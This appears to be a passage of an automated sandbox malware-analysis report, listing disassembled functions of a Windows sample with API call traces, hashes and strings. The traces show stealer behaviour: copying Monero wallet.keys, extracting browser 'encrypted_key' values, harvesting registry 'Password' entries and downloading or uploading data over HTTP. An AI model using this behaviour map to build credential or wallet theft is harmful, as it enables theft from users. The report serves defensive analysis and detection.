                      • Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
                      • Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485318
                    • lstrlen.KERNEL32(00000000), ref: 0048532F
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00485364
                    • lstrlen.KERNEL32(00000000), ref: 00485383
                    • lstrlen.KERNEL32(00000000), ref: 004853AE
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: f0588014511e6c18cdaf3ad0d6b6316384da649a5ee87cd53537b7d720a72510
                    • Instruction ID: 6b015892b98b068dbfc9455735fa27259d57fd5272d7880ecf4fba40e257bac2
                    • Opcode Fuzzy Hash: f0588014511e6c18cdaf3ad0d6b6316384da649a5ee87cd53537b7d720a72510
                    • Instruction Fuzzy Hash: 52514F70910108ABEB18FF65C992AED3779AF10304F50482FF40A56591EF7C6B56CB7A
                    Function 004812D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: bbc92471cd2d83712ee47261bf0cfef1e450ef92d602ee95126b726bd47e2d10
                    • Instruction ID: 61ccf89482e4590b8d32774e154dbdece4ef439bcb17c6dc593c0ff62a87cea5
                    • Opcode Fuzzy Hash: bbc92471cd2d83712ee47261bf0cfef1e450ef92d602ee95126b726bd47e2d10
                    • Instruction Fuzzy Hash: 74C1A5B59001099BCB14FF60DC89FEE7379BB54308F0049DEE50AA7251DB78AA85CFA5
                    Function 00484280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 004842EC
                    • lstrcat.KERNEL32(?,0123E370), ref: 0048430B
                    • lstrcat.KERNEL32(?,?), ref: 0048431F
                    • lstrcat.KERNEL32(?,0123D540), ref: 00484333
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 00488D90: GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F
                      • Part of subcall function 00479CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00479D39
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 004893C0: GlobalAlloc.KERNEL32(00000000,004843DD,004843DD), ref: 004893D3
                    • StrStrA.SHLWAPI(?,0123E1A8), ref: 004843F3
                    • GlobalFree.KERNEL32(?), ref: 00484512
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
                      • Part of subcall function 00479AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
                      • Part of subcall function 00479AC0: LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 004844A3
                    • StrCmpCA.SHLWAPI(?,004908D1), ref: 004844C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 004844D2
                    • lstrcat.KERNEL32(00000000,?), ref: 004844E5
                    • lstrcat.KERNEL32(00000000,00490FB8), ref: 004844F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 7a5953508e02b78d397add2c8500f231c2078275f6bed257bbb8173ba3a88466
                    • Instruction ID: c98bd3cef1e73dee769da88a6da527ce789746f99b8a59178426190f283d9d67
                    • Opcode Fuzzy Hash: 7a5953508e02b78d397add2c8500f231c2078275f6bed257bbb8173ba3a88466
                    • Instruction Fuzzy Hash: 547157B6900208BBDB14FBE0DC85FEE7379AB88304F04459DF60997181EA78DB55CB95
                    Function 00471310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004712B4
                      • Part of subcall function 004712A0: RtlAllocateHeap.NTDLL(00000000), ref: 004712BB
                      • Part of subcall function 004712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004712D7
                      • Part of subcall function 004712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004712F5
                      • Part of subcall function 004712A0: RegCloseKey.ADVAPI32(?), ref: 004712FF
                    • lstrcat.KERNEL32(?,00000000), ref: 0047134F
                    • lstrlen.KERNEL32(?), ref: 0047135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00471377
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00471465
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 004714EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: 96ed77dd4ac376a0937a21fbdec1faf1453364f7e35a15196d0cfe74638244be
                    • Instruction ID: e79b2ac46bd339641254e03a6fa1001e5f3129794780f40cc0ea9089a2c0def1
                    • Opcode Fuzzy Hash: 96ed77dd4ac376a0937a21fbdec1faf1453364f7e35a15196d0cfe74638244be
                    • Instruction Fuzzy Hash: 925164B1D101185BDB15FB61DC92FED733CAF50304F4045EEB60A62091EE786B99CBAA
                    Function 004775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0047733A
                      • Part of subcall function 004772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004773B1
                      • Part of subcall function 004772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0047740D
                      • Part of subcall function 004772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00477452
                      • Part of subcall function 004772D0: HeapFree.KERNEL32(00000000), ref: 00477459
                    • lstrcat.KERNEL32(00000000,004917FC), ref: 00477606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00477648
                    • lstrcat.KERNEL32(00000000, : ), ref: 0047765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 0047768F
                    • lstrcat.KERNEL32(00000000,00491804), ref: 004776A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 004776D3
                    • lstrcat.KERNEL32(00000000,00491808), ref: 004776ED
                    • task.LIBCPMTD ref: 004776FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 04b62ced232289f04cca77523f37400c4989add7f2fdd49d1381d2ed3d5b94c6
                    • Instruction ID: 5680078f2224a3743f068bcf2819f254980c1f52b4a48c731e4245cdc856c424
                    • Opcode Fuzzy Hash: 04b62ced232289f04cca77523f37400c4989add7f2fdd49d1381d2ed3d5b94c6
                    • Instruction Fuzzy Hash: CF315EB1A00109EBCB04EBF5DC89DFE7775FB44305B54821EF106A7290DA38A986CB66
                    Function 00488100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0123E0D0,00000000,?,00490E2C,00000000,?,00000000), ref: 00488130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00488137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00488158
                    • __aulldiv.LIBCMT ref: 00488172
                    • __aulldiv.LIBCMT ref: 00488180
                    • wsprintfA.USER32 ref: 004881AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 779df993f302427ae03cc170133cc9b82ffb5e282ddfba718a1299b277dbd140
                    • Instruction ID: b81a6bfe40f840e137cd4e492939b32e56726a56752d4d6336444b2d59a99e95
                    • Opcode Fuzzy Hash: 779df993f302427ae03cc170133cc9b82ffb5e282ddfba718a1299b277dbd140
                    • Instruction Fuzzy Hash: E7210EF1E44218ABDB04EFD5CC49FAEB779FB44714F204619F605BB280D77869018BA9
                    Function 004760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                    • InternetOpenA.WININET(00490DF7,00000001,00000000,00000000,00000000), ref: 0047610F
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 00476147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0047618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004761B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 004761DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0047620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00476249
                    • InternetCloseHandle.WININET(?), ref: 00476253
                    • InternetCloseHandle.WININET(00000000), ref: 00476260
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 2e95b90e384e243b5cff099324eed2254a06ee4eb91abeedd2d9ddf0155028a6
                    • Instruction ID: be20a424b778eaed9707d2aa953f943c8a53edc4e737eac2906fbf4d95028fb5
                    • Opcode Fuzzy Hash: 2e95b90e384e243b5cff099324eed2254a06ee4eb91abeedd2d9ddf0155028a6
                    • Instruction Fuzzy Hash: 345196B0900208AFDB10EF91CC49BEE7779EB04305F10859AF609A71C1DBB86A85CF5A
                    Function 004772D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0047733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004773B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0047740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00477452
                    • HeapFree.KERNEL32(00000000), ref: 00477459
                    • task.LIBCPMTD ref: 00477555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: 0c57d87fc465b842dfa4d7898a96d522fb10d5315194d9cbcc621849a2531581
                    • Instruction ID: dbe5aff23e83898a50f6197ea4e26f651b5c451e8b2c49ecdba4f5a5383348bf
                    • Opcode Fuzzy Hash: 0c57d87fc465b842dfa4d7898a96d522fb10d5315194d9cbcc621849a2531581
                    • Instruction Fuzzy Hash: 45615AB58441689BDB24DB50CC45BDAB7B8BF44304F00C1EAE64DA6241DBB45FC9CFA5
                    Function 0047BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    • lstrlen.KERNEL32(00000000), ref: 0047BC9F
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0047BCCD
                    • lstrlen.KERNEL32(00000000), ref: 0047BDA5
                    • lstrlen.KERNEL32(00000000), ref: 0047BDB9
